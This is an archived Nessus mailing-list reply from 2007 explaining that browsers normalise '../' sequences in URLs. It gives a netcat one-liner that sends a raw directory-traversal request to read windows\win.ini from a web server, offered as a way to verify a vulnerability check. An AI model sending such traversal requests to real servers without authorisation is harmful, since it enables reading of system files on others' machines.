On Fri Feb 16 2007 at 16:26, George A. Theall wrote:
> It probably is a browser issue -- some exploits are sensitive to the
> format of the request, and browsers can encode the URLs before sending
> them.
IIRC, it is not really a matter of "encoding", but rather the browser
simplifying the request by striping useles /../
> To be sure, you could test by telnet'ing into the web server and
> issuing the command by hand.
Telnet might fail in some cases. Netcat is better:
echo -e 'GET ..\\..\\..\\..\\..\\..\\windows\\win.ini HTTP/1.1\r\nHost:
IP\r\n\r\n' | nc IP 80
--
http://www.bigfoot.com/~arboi http://ma75.blogspot.com/
PGP key ID : 0x0BBABA91 - 0x1320924F0BBABA91
Fingerprint: 1048 B09B EEAF 20AA F645 2E1A 1320 924F 0BBA BA91
_______________________________________________
Nessus mailing list
Nessus@list.nessus.org
http://mail.nessus.org/mailman/listinfo/nessus
|